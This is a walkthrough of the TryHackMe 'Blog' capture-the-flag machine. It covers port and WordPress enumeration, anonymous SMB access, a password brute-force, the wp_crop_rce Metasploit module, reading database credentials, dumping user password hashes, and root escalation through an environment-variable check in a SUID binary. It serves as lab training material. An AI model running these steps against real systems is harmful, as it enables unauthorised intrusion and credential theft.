Blog machine on THM

Long story short: Billy Joel made a WordPress blog! Unfortunately it is not a very well configured one, which leaves room for a lot of vulnerabilities.
Information gathering
Enumeration
nmap
Command:
```sh
nmap -sC -sV -A -p- 10.10.69.205
```
Results
```
PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 57:8a:da:90:ba:ed:3a:47:0c:05:a3:f7:a8:0a:8d:78 (RSA)
|   256 c2:64:ef:ab:b1:9a:1c:87:58:7c:4b:d5:0f:20:46:26 (ECDSA)
|_  256 5a:f2:62:92:11:8e:ad:8a:9b:23:82:2d:ad:53:bc:16 (ED25519)
80/tcp  open  http         Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Billy Joel's IT Blog – The IT blog
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-generator: WordPress 5.0
139/tcp open  netbios-ssn  Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  microsoft-ds Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: BLOG, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: blog
|   NetBIOS computer name: BLOG\x00
|   Domain name: \x00
|   FQDN: blog
|_  System time: 2023-08-08T13:03:45+00:00
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2023-08-08T13:03:45
|_  start_date: N/A
```
dirb
Command:
```sh
dirb http://10.10.69.205
```
Results
```
---- Scanning URL: http://10.10.69.205/ ----
==> DIRECTORY: http://10.10.69.205/0/
+ http://10.10.69.205/admin (CODE:302|SIZE:0)
+ http://10.10.69.205/atom (CODE:301|SIZE:0)
+ http://10.10.69.205/dashboard (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.69.205/embed/
+ http://10.10.69.205/favicon.ico (CODE:200|SIZE:0)
==> DIRECTORY: http://10.10.69.205/feed/
+ http://10.10.69.205/index.php (CODE:301|SIZE:0)
+ http://10.10.69.205/login (CODE:302|SIZE:0)
```
wpscan
Command (the enumeration targets passed to -e are comma-separated):
```sh
wpscan --url http://blog.thm -e vp,vt,u,dbe,cb
```
Results
```
[+] URL: http://blog.thm/ [10.10.69.205]
[+] Started: Tue Aug 8 09:27:42 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://blog.thm/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://blog.thm/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://blog.thm/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://blog.thm/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://blog.thm/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
 | Found By: Rss Generator (Passive Detection)
 |  - http://blog.thm/feed/, <generator>https://wordpress.org/?v=5.0</generator>
 |  - http://blog.thm/comments/feed/, <generator>https://wordpress.org/?v=5.0</generator>

[+] WordPress theme in use: twentytwenty
 | Location: http://blog.thm/wp-content/themes/twentytwenty/
 | Last Updated: 2023-03-29T00:00:00.000Z
 | Readme: http://blog.thm/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 2.2
 | Style URL: http://blog.thm/wp-content/themes/twentytwenty/style.css?ver=1.3
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://blog.thm/wp-content/themes/twentytwenty/style.css?ver=1.3, Match: Version: 1.3

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Aug 8 09:28:10 2023
[+] Requests Done: 31
[+] Cached Requests: 7
[+] Data Sent: 7.862 KB
[+] Data Received: 252.255 KB
[+] Memory used: 259.324 MB
[+] Elapsed time: 00:00:27
```
Exploitation
Foothold
1. List the SMB shares:
```sh
smbclient -L 10.10.105.124
Password for [WORKGROUP\kali]:

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	BillySMB        Disk      Billy's local SMB Share
	IPC$            IPC       IPC Service (blog server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            BLOG
```
2. Log in anonymously to the share and exfiltrate the files:
```sh
smbclient //10.10.105.124/BillySMB -U " "%" "
smb: \> ls
  .                                   D        0  Tue May 26 14:17:05 2020
  ..                                  D        0  Tue May 26 13:58:23 2020
  Alice-White-Rabbit.jpg              N    33378  Tue May 26 14:17:01 2020
  tswift.mp4                          N  1236733  Tue May 26 14:13:45 2020
  check-this.png                      N     3082  Tue May 26 14:13:43 2020
```
3. On the blog there are two active users: kwheel and bjoel.
4. Using wpscan we can brute-force the passwords for that list of users and get: kwheel / cutiepie1
```sh
wpscan --url http://blog.thm -U user.txt -P /usr/share/wordlists/rockyou.txt
```
5. With that login we can use the Metasploit module multi/http/wp_crop_rce and get a session. Afterwards we can read the wp-config.php file for the DB connection settings:
```php
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'blog');

/** MySQL database username */
define('DB_USER', 'wordpressuser');

/** MySQL database password */
define('DB_PASSWORD', 'LittleYellowLamp90!@');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/** Custom FS Method */
define('FS_METHOD', 'direct');
```
6. Spawn a shell in meterpreter with the "shell" command and log in to MySQL:
```sh
mysql -h localhost -u wordpressuser -p
```
7. Check the wp_users table and dump its content:
```sql
select * from wp_users;
+----+------------+------------------------------------+---------------+------------------------------+----------+---------------------+---------------------+-------------+---------------+
| ID | user_login | user_pass                          | user_nicename | user_email                   | user_url | user_registered     | user_activation_key | user_status | display_name  |
+----+------------+------------------------------------+---------------+------------------------------+----------+---------------------+---------------------+-------------+---------------+
|  1 | bjoel      | $P$BjoFHe8zIyjnQe/CBvaltzzC6ckPcO/ | bjoel         | nconkl1@outlook.com          |          | 2020-05-26 03:52:26 |                     |           0 | Billy Joel    |
|  3 | kwheel     | $P$BedNwvQ29vr1TPd80CDl6WnHyjr8te. | kwheel        | zlbiydwrtfjhmuuymk@ttirv.net |          | 2020-05-26 03:57:39 |                     |           0 | Karen Wheeler |
+----+------------+------------------------------------+---------------+------------------------------+----------+---------------------+---------------------+-------------+---------------+
```
Privilege escalation
- Checking the SUID bits we can find a file /usr/sbin/checker
- Running strings on it we can check its logic and see there is an environment variable called admin on which the role decision is based
- Export that variable set to 1 (export admin=1) and run /usr/sbin/checker again; it will give you root rights
- Get the root flag from /root/root.txt: [RootFlag]
- Search for the user.txt file; the correct one is in /media/usb
- Get the user flag: [UserFlag]